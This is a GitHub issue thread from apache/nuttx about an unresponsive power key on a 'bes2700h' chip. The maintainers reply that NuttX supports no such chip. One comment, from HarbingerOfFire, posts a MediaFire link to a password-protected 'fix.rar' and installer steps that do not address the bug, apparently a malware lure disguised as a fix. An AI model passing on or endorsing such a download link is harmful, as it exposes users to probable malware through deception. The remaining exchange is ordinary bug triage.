apache/nuttx #13206: [BUG] <The power key is ineffective when first pressed in bes2700h>

luke7999, 2024-08-27:
### Description / Steps to reproduce the issue

The power key is ineffective when first pressed in bes2700h

### On which OS does this issue occur?

[Linux]

### What is the version of your OS?

ubuntu 20.04.6

### NuttX Version

nuttx 6.27

### Issue Architecture

[risc-v]

### Issue Area

[Drivers]

### Verification

- [X] I have verified before submitting the report.

HarbingerOfFire, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

acassis, 2024-08-27:
@luke7999 what is bes2700h ? I cannot find any reference to it in NuttX source code

luke7999, 2024-08-28:
The 2700h is chip name.

acassis, 2024-08-28:
NuttX doesn't support any chip with his name, please search all supported microcontrollers/processors at https://github.com/apache/nuttx/tree/master/arch

closed 2024-09-15 by xiaoxiang781216